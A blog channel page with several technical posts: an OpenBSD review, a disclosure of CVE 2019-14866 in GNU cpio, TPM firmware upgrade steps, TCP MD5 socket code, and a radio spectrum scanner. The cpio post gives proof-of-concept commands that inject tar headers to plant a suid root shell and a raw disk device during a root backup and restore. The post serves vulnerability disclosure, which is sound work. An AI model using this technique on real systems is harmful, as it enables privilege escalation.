Channel: Blargh

OpenBSD in 2019

I’ve used OpenBSD on and off since 2.1. More back then than in the last 10 years or so though, so I thought I’d try it again.

What triggered this was me finding a silly bug in GNU cpio that has existed with a “FIXME” comment since at least 1994. I checked OpenBSD to see if it had a related bug, but as expected, no, it was just fine.

I don’t quite remember why I stopped using OpenBSD for servers, but I do remember filesystem corruption on “unexpected power disconnections” (even with softdep turned on), which I’ve never really seen on Linux.

That and that fewer things “just worked” than with Linux, which matters more when I installed more random things than I do now. I’ve become a lot more minimalist. Probably due to less spare time. Life is better when you don’t run things like PHP (not that OpenBSD doesn’t support PHP, just an example) or your own email server with various antispam tooling, and other things.

This is all experience from running OpenBSD on a server. On my next laptop I intend to try running OpenBSD on the desktop, and will see if that more ad-hoc environment works well. E.g. will gnuradio work? Lack of other-OS VM support may be a problem.

How to run OpenBSD in 2019

The easiest way to run servers nowadays is to just rent VMs on public clouds. Unfortunately most clouds don’t support OpenBSD. Vultr does, and they’re pretty good. They have IPv6-only VMs (US locations only) that are only $2.50/month ($3.50/month with IPv4). They also, unlike some other cloud vendors, give access to the actual console, which is very helpful.

I installed OpenBSD 6.5 (the newest, at the time), and tried it out.

The good

  • Security mindset. Should go without saying, but it’s a perfectly usable Unix system that places security first. They may not be first (e.g. took them years to reinvent W^X behind Linux), but they were the first to turn on the features by default, and you can trust them to continue to do so. E.g. who else bothers to link a unique kernel per system?

  • Ports and packages end up in /usr/local, and anything outside that either you put there, or it’s the base system. Sure, it means /usr/local may be a bit of a mess, but outside of it isn’t.

  • It’s clear what base system you’re running. Kernel and everything is plainly “6.6” (or whatever). Well… plus any syspatch fixes.

  • Upgrading the system to OpenBSD 6.6 was easy. I had my fears, but it was about as easy as installing.

  • The init system has gotten start/stop scripts, in /etc/rc.d. From what I remember /etc/rc used to be one big start script, with no good way to restart services without remembering what took a HUP, what wanted its own tool, etc…

  • Most things just worked. My Go code worked fine. Well, except for an annoying bug in Go’s sys/unix and syscall libraries, that (like the GNU cpio bug) is not a great sign of quality.

  • Modern enough clang to support C++17. The GCC version is stuck in the stone age because of licensing, but clang is a worthy replacement now. Development should be good here.

  • Since I’d fixed some MPLS code a long time ago I read through the MPLS forwarding code. Like when I checked OpenBSD’s cpio code I found it of very high quality, with APIs designed such that it’s hard to use them incorrectly, or to leak resources.

  • I generally find the OpenBSD manpages to be of higher quality than GNU ones. Also nice to have man section 9 (kernel internals) installed by default.

The bad

It’s less smooth to use. It lacks many convenience options in tools. Some examples:

  • The easy path to upgrading seems to require console access, and taking the server out of commission for a while while doing it. Compare this with Debian where I’ve run servers for 10 years, confidently upgrading the whole OS remotely the whole time and without access to console.

  • Upgrading also has a bunch of manual cleanup steps.

  • I can reliably crash it by using too much RAM. Completely freezes it, even the console and not answering ping. I don’t know if this is OpenBSD’s fault, or a result of it being in a VM, or something on Vultr’s side. Adding some more swap helped, but that just delays the problem.

  • There’s no default package repo path, so you have to choose a mirror yourself and set PKG_PATH. And since I’m on an IPv6-only VM I had to check a few before finding one that had an IPv6 address.

  • find requires a path argument. I don’t see why it can’t default to . (the current directory).

  • du doesn’t take a -m switch. Workaround is BLOCKSIZE=1000000 du -cs * which is not as friendly.

  • which brings me to: if the correction to SI units was lacking in Linux it’s completely absent in OpenBSD. I’m guessing they’ve chosen not to.

  • OpenBSD’s tar can’t read /etc/spwd.db due to security features, which is great and all, but prevents backing up /etc and being able to check exit code for success of everything else. It also doesn’t support exclusion or inclusion lists. I would have changed my portable backup scripts to cpio, but because GNU cpio has the bug mentioned earlier I can’t. OpenBSD’s default shell (ksh) has support for glob exclusions, as does bash. But it’s not a great solution (cmdline length for one, and this could be its own blog post so I’ll stop here). Luckily you can install GNU tar as a package and use that.

  • TCP MD5 seems to be implemented as system-wide settings. It’s understandable but I don’t like it. More on that here.

  • After upgrading to OpenBSD 6.6 random shellscripts started failing. Turns out /bin/sh couldn’t handle the large HISTSIZE that I had set for bash, and it just aborts the shell if set too high, instead of making do with less history. The developers were very responsive and it’s been fixed now, but still needs to be improved a bit further, as they pointed out.

  • While the manpages are good, the source code is not very well commented. I agree that good code doesn’t need “what does it do”, but it does need “why”. Specifically what I found missing were:
    • What is an “environment” in ksh? What is its purpose?
    • Why is ksh using its own allocator?
  • I found a bug in the first part of the kernel I looked at. Not a serious one, but still.

  • acme-client (at least in 6.5) doesn’t work with IPv6-only machines. I fixed the first step by replacing a PF_UNSPEC with PF_INET6, but then the next step failed so I switched to certbot.

  • There are some Linux-only things. Pov-Ray 3.7, in addition to switching (since 3.6) to the terrible AGPL, switched to build scripts that only work on Linux. This sucks for my distributed render project.

  • Postgresql was a bit awkward to set up, since the unix user is _postgresql, but the postgres user is postgres. Adding export PGUSER=postgres to ~_postgresql/.profile seemed like the best fix.

  • The equivalent to strace, ktrace/kdump, is a two-step process, and does not produce as good output.

  • No checksumming filesystem in sight.

  • Less binary compatibility. Linux is strict on not breaking userspace, but OpenBSD seems less so. Seems the old dnetc binaries don’t work on a modern OpenBSD system, for example.

  • The general OpenBSD attitude. Read the last paragraph of this FAQ and tell me you feel like this is a system and people that care about your use cases. It really says that this is their OS, and if you happen to be able to run it then good for you.

Verdict

Ouch, that’s a long list of bad stuff. Still, I like it. I’ll continue to run it, and will make sure my stuff continues working on OpenBSD.

And maybe in a year I’ll have a review of OpenBSD on a laptop.


CVE 2019-14866: GNU cpio

I found a security bug in GNU cpio and thought I’d write down the story of that. It’s not the most interesting bug in the world, but it may still be an interesting story to some.

An odd limit

The whole thing started with me looking at the manpage:

-H, --format=FORMAT
  Use given archive FORMAT. Valid formats are (the number in
  parentheses gives maximum size for individual archive member):
  bin    The obsolete binary format. (2147483647 bytes)
  odc    The old (POSIX.1) portable format. (8589934591 bytes)
  newc   The new (SVR4) portable format, which supports file
         systems having more than 65536 i-nodes. (4294967295 bytes)
  crc    The new (SVR4) portable format with a checksum added.
  tar    The old tar format. (8589934591 bytes)
  ustar  The POSIX.1 tar format. Also recognizes GNU tar archives, which are
         similar but not identical. (8589934591 bytes)
  hpbin  The obsolete binary format used by HPUX's cpio (which stores device
         files differently).
  hpodc  The portable format used by HPUX's cpio (which stores device files
         differently).

What’s wrong with this picture? Those are some very odd size limits. 2GiB and 4GiB I understand, as it’s 32bit signed and unsigned int. But tar having a max size of 8GiB? 33 bits? That doesn’t make any sense.

I was lucky finding this because some versions of the manpage don’t have this info. E.g. this and this.

Turns out the tar header format stores file size in 12 bytes, as a string in octal! There are variants and extensions, but long story short that’s the common limit.

That’s… terrible. But it’s a format from the stone age, so maybe can be forgiven.
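To make the 33 bits concrete, here is a small Python sketch of the arithmetic. It assumes the 12-byte field holds 11 octal digits plus one terminator byte, which is what the 8589934591 figure in the manpage implies; the constant names are made up for illustration.

```python
# Assumption: a 12-byte size field = 11 octal digits + 1 terminator byte.
SIZE_FIELD_BYTES = 12
OCTAL_DIGITS = SIZE_FIELD_BYTES - 1

# Each octal digit carries 3 bits, so 11 digits carry 33 bits.
max_size = 8 ** OCTAL_DIGITS - 1

print(max_size)               # 8589934591
print(max_size.bit_length())  # 33
```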

I wonder what happens if you exceed that limit… oh… oh no

$ dd if=/dev/zero seek=16G bs=1 count=0 of=testfile.dat
$ echo testfile.dat | cpio -H tar -o | tar tf -
-rw-r--r-- 1000/1000         0 2019-11-07 13:04 testfile.dat
                          ^^^^\--- That's the size according to tar.
$ echo testfile.dat | cpio -H tar -o | wc -c
                          17179870720
                          ^^^^^^^^^^^\-- That's the total size of the file.

oh no. The tar format is a series of “hey, here comes a file named X, that’s Y bytes long, after those Y bytes I’ll tell you about the next file”.

I’ve generated a tar file that says “hey, here comes a file named testfile.dat that’s 0 bytes long. After those 0 bytes comes another file header.”

This means I can make cpio read data (contents of file it reads), and write it as if it’s metadata (a tar header):

$ tar cf suffix.tar AUTHORS                            # Create some payload.
$ dd if=/dev/zero seek=16G bs=1 count=0 of=suffix.tar  # Pad it to "look like" 0 bytes.
$ echo suffix.tar | cpio -H tar -o | tar tvf -         # Feed it to cpio.
    -rw-r--r-- 1000/1000       0 2019-08-30 16:40 suffix.tar
    -rw-r--r-- thomas/thomas 161 2019-08-30 16:40 AUTHORS

The point here is that cpio was fed one file (suffix.tar) to put into the tar file, but it put two files in there. cpio never read AUTHORS, and it should not be listed.
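The same effect can be reproduced without cpio. This is a sketch using Python's standard `tarfile` module, not the author's method: it hand-builds the bytes a buggy writer would emit (a header claiming 0 bytes, followed by file contents that are themselves a tar archive) and then lists the result. The file names mirror the example above; the payload text and the `make_tar` helper are made up.

```python
import io
import tarfile


def make_tar(name, data):
    """Build a small, valid tar archive in memory holding one file."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w", format=tarfile.USTAR_FORMAT) as tf:
        info = tarfile.TarInfo(name)
        info.size = len(data)
        tf.addfile(info, io.BytesIO(data))
    return buf.getvalue()


# The attacker-controlled file contents: a complete tar archive.
payload = make_tar("AUTHORS", b"made-up payload\n")

# What the buggy writer emits: a header saying suffix.tar is 0 bytes long,
# followed by the file contents anyway.
header = tarfile.TarInfo("suffix.tar")
header.size = 0
outer = header.tobuf(format=tarfile.USTAR_FORMAT) + payload

# A reader trusts the 0, so it parses the contents as the next header.
names = tarfile.open(fileobj=io.BytesIO(outer)).getnames()
print(names)  # ['suffix.tar', 'AUTHORS']
```

Only one file was "archived", but the reader sees two, because the data is parsed as metadata.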

But so what?

The above is obviously wrong, but how is it a security issue?

It’s a security issue because it’s not just the contents of the injected files that can have arbitrary content, but also the type of file, owner, and suid bits.

I could prepare a payload tar file that contains a suid root shell, and a /dev/sda block device.

evil$ # 1) Prep payload
evil$ ./generate_evil_data --out /home/evil/foo.tar

root# # 2) root user performs backup
root# find /home -print0 | cpio -0 -H tar -o > /var/backup/h.tar

root# # 3) root user restores
root# cd /
root# tar xf /var/backup/h.tar /home/evil/

evil$ # 4) evil user uses newly created rootshell, or writes to /dev/sda
evil$ ls -l /home/evil/
-rwsr-xr-x 1 root root 61176 Aug  3  2018 /home/evil/rootshell
brw-rw---- 1 evil evil 8, 0 Oct  7 11:21 /home/evil/sda-pwned
evil$ /home/evil/rootshell
# id
uid=0(root) gid=0(root) groups=0(root)

Finding the code culprit

static void    // [no error checking]
to_oct(long value, […])
{
  [… write as many octal digits as possible, not checking if `value` didn't fit …]
}
[…]
void           // [no error checking]
write_out_tar_header (struct cpio_file_stat *file_hdr, int out_des)
[…]
write_out_header([…])
[…]
write_out_tar_header (file_hdr, out_des); /* FIXME: No error checking */
return 0;    // [0 means success]

That “FIXME” is in the original, and appears to have been there since at least 1994.
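As an illustration of the failure mode (a Python sketch, not the actual cpio code), here is a fixed-width octal writer that silently drops the high digits, next to one that refuses values that don't fit. Both function names are hypothetical.

```python
def to_oct_unchecked(value, digits):
    """Fill a fixed-width octal field from the right, dropping what doesn't fit."""
    out = []
    for _ in range(digits):
        out.append(str(value & 7))  # lowest octal digit
        value >>= 3
    # Whatever is left in `value` here is silently lost.
    return "".join(reversed(out))


def to_oct_checked(value, digits):
    """Same field, but report an error instead of truncating."""
    if value < 0 or value >= 8 ** digits:
        raise OverflowError("%d does not fit in %d octal digits" % (value, digits))
    return format(value, "0%do" % digits)


sixteen_gib = 16 * 2 ** 30
print(to_oct_unchecked(sixteen_gib, 11))  # 00000000000
print(to_oct_checked(161, 11))            # 00000000241
```

16GiB is exactly 2 followed by eleven zeros in octal, so the truncated field reads as 0, matching the size tar printed earlier.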

There may be millions of scripts out there using cpio that are vulnerable.

The tar format is largely to blame here. It’s a “packet in packet” attack which could have been prevented if tar, like many many other formats and protocols, used a regular language (also see this talk).

Well the tar format and a code bug from like 1994.

So is this only GNU, or more implementations?

OpenBSD, as usual, is fine.

Reporting

I reported to the bug-cpio mailing list, being a bit vague describing it only as “hey, that’s surprising output”, hoping to get the patch in early.

After 10 days with no reply I emailed the Debian package maintainer and cpio owner directly. No response.

Another week later I started emailing security@debian.org and secalert@redhat.com. Red Hat took 10 days to respond. Debian 13 days.

It took a bit of back and forth to explain why this was a security issue, but Red Hat eventually created CVE 2019-14866.

On 2019-10-25 the cpio maintainer created a separate patch for the problem. It’s multiple changes in one, which is not great, so for backporting the change to Debian old and oldold stable the Debian package maintainer chose to go with my minimal patch (with a 32bit arch fix).

  • Ubuntu (calls this expose of info, but it’s privesc).
  • Debian
  • Red Hat

Librem13v2 TPM upgrade

I have upgraded my TPM firmware on my Librem13v2. Its keys are now safe. \o/

Back in 2017 we had the Infineon disaster (aka ROCA). I’ve written before about how bad it is, and how to check if you’re affected with a simple tool.

I TAKE NO RESPONSIBILITY IF YOU BRICK YOUR DEVICE OR FOR ANYTHING ELSE BAD HAPPENING FROM YOU FOLLOWING MY NOTES.

Before the upgrade

$ tpm_version | grep Chip
Chip Version:        1.2.4.40    <--- Example vulnerable version
$ cbmem -c | grep Purism         # I upgraded coreboot/SeaBIOS just before doing this.
coreboot-4.9-10-g123a4c6101-4.9-Purism-2 Wed Nov 13 19:54:43 UTC 2019 […]
[…]
Found mainboard Purism Librem 13 v2

Download upgrade tool

$ wget https://repo.pureos.net/pureos/pool/main/t/tpmfactoryupd/tpmfactoryupd_1.1.2459.0-0pureos9_amd64.deb
[…]
$ alien -t tpmfactoryupd_1.1.2459.0-0pureos9_amd64.deb
[…]
$ tar xfz tpmfactoryupd-1.1.2459.0.tgz
$ mv usr/bin/TPMFactoryUpd .
$ sudo systemctl stop trousers.service         # Need to turn off tcsd for TPMFactoryUpd to work in its default mode.
[…]
$ ./TPMFactoryUpd -info
  **********************************************************************
  *    Infineon Technologies AG   TPMFactoryUpd   Ver 01.01.2459.00    *
  **********************************************************************

       TPM information:
       ----------------
       Firmware valid                    :    Yes
       TPM family                        :    1.2
       TPM firmware version              :    4.40.119.0
       TPM enabled                       :    Yes
       TPM activated                     :    Yes
       TPM owner set                     :    Yes
       TPM deferred physical presence    :    No (Not settable)
       Remaining updates                 :    64

Note the status of the TPM: enabled, active, owner set, and not “physical presence”. This is not the state we want to be in for our upgrade.

Get TPM into state ready to upgrade.

The TPM must be enabled and active. If it’s not then you need to get into your BIOS to fix that. You may need to enter from a clean power off. A “reboot” may not be enough.

There are two TPM chip states where an upgrade will work:

  1. Deferred physical presence is set to “yes”. You may be able to get into this state on some machines by using tpm_clear, and then rebooting. Your BIOS will then ask you “do you confirm TPM physical presence?”. I believe one of my other machines did this, but it’s been too long for me to be sure. It looks like this is not possible with the Librem13v2, so I won’t talk about this option any further.
  2. The “Owner” must be cleared.

To clear the TPM I did:

  1. tpm_clear
  2. Reboot
  3. When the Purism screen shows, press ESC
  4. Press t to enter the TPM menu
  5. Choose c to clear the TPM
  6. Choose e to enable the TPM
  7. Choose a to activate the TPM. The machine automatically reboots
  8. At the grub menu, press e on your normal boot option
  9. Go to the end of the kernel line and add iomem=relaxed at the end
  10. Press F10 to boot
  11. Confirm TPM state is enabled, activated, owner NOT set:

      $ ./TPMFactoryUpd -info
        **********************************************************************
        *    Infineon Technologies AG   TPMFactoryUpd   Ver 01.01.2459.00    *
        **********************************************************************

             TPM information:
             ----------------
             Firmware valid                    :    Yes
             TPM family                        :    1.2
             TPM firmware version              :    4.40.119.0
             TPM enabled                       :    Yes    <--- correct
             TPM activated                     :    Yes    <--- correct
             TPM owner set                     :    No     <--- correct
             TPM deferred physical presence    :    No (Not settable)
             Remaining updates                 :    64

Upgrade

  1. Download and unzip the firmware.
  2. Upgrade the TPM

      $ sudo ./TPMFactoryUpd -update tpm12-takeownership -firmware TPM12_4.40.119.0_to_TPM12_4.43.257.0.BIN
        **********************************************************************
        *    Infineon Technologies AG   TPMFactoryUpd   Ver 01.01.2459.00    *
        **********************************************************************

             TPM update information:
             -----------------------
             Firmware valid                    :    Yes
             TPM family                        :    1.2
             TPM enabled                       :    Yes
             TPM activated                     :    Yes
             TPM owner set                     :    No
             TPM deferred physical presence    :    No (Not settable)
             TPM firmware version              :    4.40.119.0
             Remaining updates                 :    64
             New firmware valid for TPM        :    Yes
             TPM family after update           :    1.2
             TPM firmware version after update :    4.43.257.0

             Preparation steps:
             TPM1.2 Ownership preparation was successful.

             DO NOT TURN OFF OR SHUT DOWN THE SYSTEM DURING THE UPDATE PROCESS!

             Updating the TPM firmware ...
             Completion: 100 %
             TPM Firmware Update completed successfully.
    
  3. Confirm upgrade

      $ ./TPMFactoryUpd -info
        **********************************************************************
        *    Infineon Technologies AG   TPMFactoryUpd   Ver 01.01.2459.00    *
        **********************************************************************

             TPM information:
             ----------------
             Firmware valid                    :    Yes
             TPM family                        :    1.2
             TPM firmware version              :    4.43.257.0
             TPM enabled                       :    Yes
             TPM activated                     :    No
             TPM owner set                     :    Yes
             TPM deferred physical presence    :    No (Settable)     <--- huh? ok
             Remaining updates                 :    63
      $ tpm_version | grep Chip
        Chip Version:        1.2.4.43
    
  4. Reboot
  5. Press ESC, t to enter TPM menu again
  6. Enable & activate the TPM, reboot.
  7. tpm_takeownership -z

Confirming generated keys are good

Using my tool mentioned here.

$ ./check-srk
Running self test…
Size: 2048
Modulus:
2357823904823904723[…]4782347892347238913
--------------
The key is fine.

Thanks

Huge thanks to MrChromebox on #purism for the help.

TCP MD5

TCP_MD5 (RFC 2385) is something that doesn’t come up often. There’s a couple of reasons for that, good and bad.

I used it with tlssh, but back then (2010) it was not practical due to the limitations in the API on Linux and OpenBSD.

This is an updated post, written after I discovered TCP_MD5SIG_EXT.

What it is

In short it’s a TCP option that adds an MD5-based signature to every TCP packet. It signs the source and destination IP addresses, ports, and the payload. That way the data is both authenticated and integrity protected.
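To show what "signs" means here, below is a rough Python sketch of the digest as I read RFC 2385: MD5 over the pseudo-header, the fixed TCP header with the checksum treated as zero and options excluded, the payload, and finally the key. It is IPv4 only, the function name is hypothetical, and the addresses, ports and header values are made up. Treat it as an illustration, not a reference implementation.

```python
import hashlib
import socket
import struct


def tcp_md5_digest(src_ip, dst_ip, fixed_header, payload, key):
    """RFC 2385 style digest for one IPv4 TCP segment (sketch).

    fixed_header is the 20-byte TCP header without options.
    """
    if len(fixed_header) != 20:
        raise ValueError("expected the 20-byte fixed TCP header")
    # Data offset (upper 4 bits of byte 12) counts 32-bit words, options included.
    header_len = (fixed_header[12] >> 4) * 4
    pseudo_header = (
        socket.inet_aton(src_ip)
        + socket.inet_aton(dst_ip)
        + struct.pack("!BBH", 0, socket.IPPROTO_TCP, header_len + len(payload))
    )
    # The checksum (bytes 16-17) is treated as zero while hashing.
    zeroed = fixed_header[:16] + b"\x00\x00" + fixed_header[18:]
    return hashlib.md5(pseudo_header + zeroed + payload + key).digest()


# Made-up segment: port 43934 -> 2222, 40-byte header (20 fixed + 20 of options).
header = struct.pack("!HHIIBBHHH", 43934, 2222, 1000, 2000, 10 << 4, 0x18, 179, 0xBEEF, 0)
digest = tcp_md5_digest("192.0.2.1", "192.0.2.2", header, b"data", b"hello")
print(digest.hex())
```

Because the addresses and ports go into the hash, anything that rewrites them in transit invalidates the signature.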

When an endpoint enables TCP MD5, all unsigned packets (including SYN packets) are silently dropped. For a signed connection it’s not even possible for an eavesdropper to reset the connection, since the RST would need to be signed.

Because it’s on a TCP level instead of part of the protocol on top of TCP, it’s the only thing that can protect a TCP connection against RST attacks.

It’s used by the BGP protocol to set a password on the connection, instead of sending the password in the handshake. If the password doesn’t match the TCP connection doesn’t even establish.

But outside of BGP it’s essentially not used, which is a shame. If we could enable it for any TCP service it’d add a preshared key and if nothing else completely replace the silly port knocking. It probably couldn’t replace user passwords, but it could add a layer and greatly reduce attack surface much more than, say, a TLS certificate.

It’s MD5. Sure, MD5 still doesn’t have any preimage attack. Well, none that’s feasible anyway.

So that should be fine. And if not then there’s already TCP AO which is about the same but with other algorithms.

How to use it

For the server (on Linux)

const char* password = "hello";
struct tcp_md5sig sig;
memset(&sig, 0, sizeof(sig));
memcpy(&sig.tcpm_addr, &peer_sockaddr, peer_sockaddr_len);
sig.tcpm_flags = TCP_MD5SIG_FLAG_PREFIX;
sig.tcpm_prefixlen = 0;  // Match any address.
// Explicit <size_t>: the macro is an int and strlen() returns size_t.
sig.tcpm_keylen = std::min<size_t>(TCP_MD5SIG_MAXKEYLEN, strlen(password));
memcpy(sig.tcpm_key, password, sig.tcpm_keylen);
if (setsockopt(s, IPPROTO_TCP, TCP_MD5SIG_EXT, &sig, sizeof(sig)) == -1) {
  fprintf(stderr, "Failed to setsockopt(): %s\n", strerror(errno));
  exit(1);
}

For the client (on Linux)

const char* password = "hello";
struct tcp_md5sig sig;
memset(&sig, 0, sizeof(sig));
memcpy(&sig.tcpm_addr, &peer_sockaddr, peer_sockaddr_len);
// Explicit <size_t>: the macro is an int and strlen() returns size_t.
sig.tcpm_keylen = std::min<size_t>(TCP_MD5SIG_MAXKEYLEN, strlen(password));
memcpy(sig.tcpm_key, password, sig.tcpm_keylen);
if (setsockopt(s, IPPROTO_TCP, TCP_MD5SIG_EXT, &sig, sizeof(sig)) == -1) {
  fprintf(stderr, "Failed to setsockopt(): %s\n", strerror(errno));
  exit(1);
}

On the client you can use TCP_MD5SIG instead of TCP_MD5SIG_EXT, since it won’t need to set the prefixlen.

The sad reason it’s not used: It doesn’t work through NAT

Because it signs the source and destination address and port. This is getting to be less and less of an issue as the world goes IPv6. So maybe we can see more of this in the future.

This was never really a problem for BGP, since production BGP doesn’t run through NAT.

It used to be impossible to use on Linux for most applications

The TCP_MD5SIG socket option on Linux requires specifying exactly what the remote address is. This doesn’t make sense for listening sockets, like an OpenSSH server, which won’t know ahead of time what the remote address is.

BGP doesn’t really have clients and servers, just mutually configured peers, so it works fine there.

It used to be possible (back in 2010) to enable MD5 after a connection is established. And indeed this is what I did with tlssh back in 2010. But trying that now it results in EINVAL. Which is odd, because TCP MD5 was made for routers, and routers most certainly allow enabling TCP MD5 on an existing connection.

You can actually make this work, and it’s what I did with tlssh: You enable TCP MD5 immediately after the connection is established. If the two ends don’t have the same password set, then no packets will go through in either direction, and the connections will just time out. Not the best experience.

Here’s the old TCP_MD5SIG API. Generally don’t use it; use TCP_MD5SIG_EXT (shown above) instead:

const char* password = "hello";
struct tcp_md5sig sig;
memset(&sig, 0, sizeof(sig));
memcpy(&sig.tcpm_addr, peer_sockaddr, sizeof(struct sockaddr_storage));
// Explicit <size_t>: the macro is an int and strlen() returns size_t.
sig.tcpm_keylen = std::min<size_t>(TCP_MD5SIG_MAXKEYLEN, strlen(password));
memcpy(sig.tcpm_key, password, sig.tcpm_keylen);
if (setsockopt(s, IPPROTO_TCP, TCP_MD5SIG, &sig, sizeof(sig)) == -1) {
  fprintf(stderr, "Failed to setsockopt(): %s\n", strerror(errno));
  exit(1);
}

On OpenBSD it’s a system-level setting

On OpenBSD you set up the TCP MD5 as a security association between the two hosts, and then the program just enables MD5 on the socket. And it “just works” on both the client and the server. Well, a bit annoying that the key is set in hex.

# cat > /etc/tcpmd5.conf
tcpmd5 from 2001:db8::1111 to 2001:db8::2222 spi 0x100 authkey 0x68656c6c6f
tcpmd5 from 2001:db8::2222 to 2001:db8::1111 spi 0x101 authkey 0x68656c6c6f
^D
# ipsecctl -f /etc/tcpmd5.conf

const int on = 1;
if (setsockopt(s, IPPROTO_TCP, TCP_MD5SIG, &on, sizeof(on)) == -1) {
  fprintf(stderr, "Failed to setsockopt(): %s\n", strerror(errno));
  exit(1);
}

Netcat with the -S option does the latter, but the password still needs to be set in the config.
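The authkey in the config above is just the password bytes written in hex. A quick way to produce it, sketched in Python (the variable names are mine):

```python
password = b"hello"

# ipsecctl wants the key as a hex string with a 0x prefix.
authkey = "0x" + password.hex()
print(authkey)  # 0x68656c6c6f
```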

So on OpenBSD it doesn’t really mesh well with adding TCP MD5 to any and all programs. Even if you set up the Security Association inside your program instead of in your config it seems more a state of the system than a state of your connection. Which makes some sense with BGP, but almost nothing else.

Patches

I’ve patched OpenSSH to enable TCP MD5. Works great. Right now it just uses a static password, but that still protects you against internet-wide spread port scans that don’t know what you’re running on port 2222.

$ sudo tcpdump -M openssh -nlpi lo port 2222
[…]
16:04:12.212566 IP6 ::1.2222 > ::1.43934: Flags [P.], seq 1828532:1828704, ack 1117, win 179, options [nop,nop,md5 valid], length 172
[…]

This sure is better than portknocking. The only problem is that it doesn’t work through IPv4 NAT. So just use IPv6.

Broadband RF scanner

Teaser output graph

Wifi spectrum plot

Building a broadband RF scanner

One great thing about software defined radio is that you can become less blind to the invisible world of radio waves that’s all around us. One simple thing is to do a survey of the spectrum, to see what parts are busy.

More practically you can also use this to find which Wifi channels are least busy, so that you can get optimal performance on your network. Counting the number of networks is not a good indicator, since one network may be completely unused, while another is used 24/7 to stream Netflix. And some networks are hidden anyway, making them no more secure, but more annoying.

GNU Radio has a bunch of building blocks for some interactive peeking at spectrums, but there’s still some assembly required in order to make actually useful things.

To do a survey I used a USRP B200 with a broadband spiral antenna. If you’re only interested in the Wifi spectrum then a 2.4/5GHz antenna is a better choice.

You can probably use a cheaper SDR, but you need to make sure it sends frequency tag updates in GNU Radio, so the block knows which frequency is tuned, as it moves across the spectrum.

Overall architecture

We need to read samples, measure the signal strength for a while, store it in a file, and also change frequency. Shouldn’t be too hard.

The missing pieces

Automate changing frequency

We need to evenly increase the frequency, and when it reaches the top, go back to the beginning. That’s a saw tooth signal.

Then we need to stick that value into a variable. That’s what the Probe Signal block is for.

So this part we can solve entirely with standard GNU Radio blocks.
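Outside of GNU Radio, the saw tooth sweep amounts to the following. This is a plain Python sketch of the math only, not of the flow graph; the function name and the 10 second period are made up, while the 800MHz to 6GHz range is the one plotted further down.

```python
def sawtooth_frequency(t, f_min, f_max, period):
    """Frequency to tune to at time t: ramp from f_min towards f_max, then wrap."""
    phase = (t / period) % 1.0  # 0.0 at the start of each sweep, approaching 1.0
    return f_min + (f_max - f_min) * phase


for t in (0, 5, 10, 15):
    print(t, sawtooth_frequency(t, 800e6, 6000e6, 10))
```

At t=0 and t=10 this gives the bottom of the range, and halfway through each period it gives the midpoint.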

Frequency modulation flow graph

Measure strength

The only piece I needed to write was a block that takes a frequency (from stream tags) and a stream of some float vectors (signal strength), and outputs frequency and signal strength.

It’s a very simple block. With not much code. It’s written for GNU Radio 3.8 and newer, but the changes are easy to backport to 3.7 for someone so inclined. The differences should just be in the yaml file that needs to be written in XML format instead.

Here’s the full flow graph:

GNURadio flow graph for broadband scanner

Results

The results can then be plotted by GNUPlot.

set terminal png truecolor rounded size 1920,720 enhanced
set output "broadband.png"
set xtics 500
set mxtics 5
set grid mxtics
set grid xtics
set grid ytics
plot [800:6000] "broadband-scan.txt" using ($2/1e6):3 with points title "Signal"

Broadband plot of 800MHz-6GHz

Or zoomed into 2.4GHz for a wifi survey:

set terminal png truecolor rounded size 1920,720 enhanced
set output "wifi.png"
set xtics 0.01
set mxtics 10
set grid xtics
set grid ytics
set object  1 rectangle from 2.401,0 to 2.423,100 fs solid fc rgb "#ffd0d0" behind
set object  6 rectangle from 2.426,0 to 2.448,100 fs solid fc rgb "#d0ffd0" behind
set object 11 rectangle from 2.451,0 to 2.473,100 fs solid fc rgb "#d0d0ff" behind
set format x "%.2fGHz"
set label  1 center at screen 0.15,0.95, char 1 "Channel 1"  font ",14"
set label  6 center at screen 0.38,0.95, char 1 "Channel 6"  font ",14"
set label 11 center at screen 0.61,0.95, char 1 "Channel 11" font ",14"
plot [2.4:2.5] "broadband-scan.txt" using ($2/1e9):3 with dots title "Signal"

Wifi spectrum plot

Guess which wifi channel I’m using, when on 2.4GHz. :-)
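If you'd rather have a number than a picture, the scan file can be summarized per channel. The sketch below is Python and rests on assumptions: that each line of broadband-scan.txt is whitespace separated with the frequency in Hz in column 2 and the strength in column 3 (which is how the gnuplot commands read it), that column 1 is the timestamp, and that a channel is 22MHz wide around 2407 + 5·n MHz (which matches the rectangles above). The function names and sample lines are made up.

```python
def channel_range_mhz(channel):
    """Lower and upper edge of a 2.4GHz wifi channel, in MHz."""
    center = 2407 + 5 * channel
    return (center - 11, center + 11)


def quietest_channel(lines, channels=(1, 6, 11)):
    """Return the channel with the lowest mean strength reading."""
    totals = {ch: [0.0, 0] for ch in channels}
    for line in lines:
        fields = line.split()
        if len(fields) < 3:
            continue  # skip blank or malformed lines
        freq_mhz = float(fields[1]) / 1e6
        strength = float(fields[2])
        for ch in channels:
            low, high = channel_range_mhz(ch)
            if low <= freq_mhz <= high:
                totals[ch][0] += strength
                totals[ch][1] += 1
    means = {ch: s / n for ch, (s, n) in totals.items() if n > 0}
    # Raises ValueError if no sample fell inside any channel.
    return min(means, key=means.get)


sample = [
    "1573000000 2412000000 50",
    "1573000001 2437000000 10",
    "1573000002 2462000000 30",
]
print(quietest_channel(sample))  # 6
```

With a real scan you would pass `open("broadband-scan.txt")` instead of the sample list.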

Future work

This flow graph saves the timestamp of the measurements, but doesn’t use it. So this can also be used to analyze spectrum usage over time. And combined with a GPS logger this could be put on a car and plot the spectrum on a map, as well.

The antenna, and its big brother, is easily attached to a car window for such purposes.

Travelling amateur

Short post today. I made a tool to make it easier to know the rules when operating amateur radio overseas.

Pull requests welcome, both on the data and design/functionality.

20 years of maintaining an open source program

It’s been almost 10 years since my previous post about this. And 20 years since 2000-02-24, which is when arping 0.1 was released. It was a 208 line C file, with a hand made Makefile.

As of today when Arping 2.21 is overdue to be released, the code in .c and .h files (excluding tests) is 3863 lines, and it uses the amazing autotools framework for analyzing dependencies.

I’ve recently had the displeasure of working with cmake, which is just the worst. Why anyone would think cmake is even remotely acceptable I’ll never understand.

CMake sucks

But the Arping story continues. It isn’t getting many new major features. Still, since the last post there’s been 205 commits, and 10 releases.

Things like:

  • Change from gettimeofday() to clock_gettime(), when available. More info about that in this blog post.
  • Don’t check for uid=0 and stop. Capabilities can come in other ways
  • Change from poll() to select() to work around bug in MacOS X
  • Use nice and modern getifaddrs() to resolve interfaces
  • Update documentation
  • Improve error messages
  • Update author email address
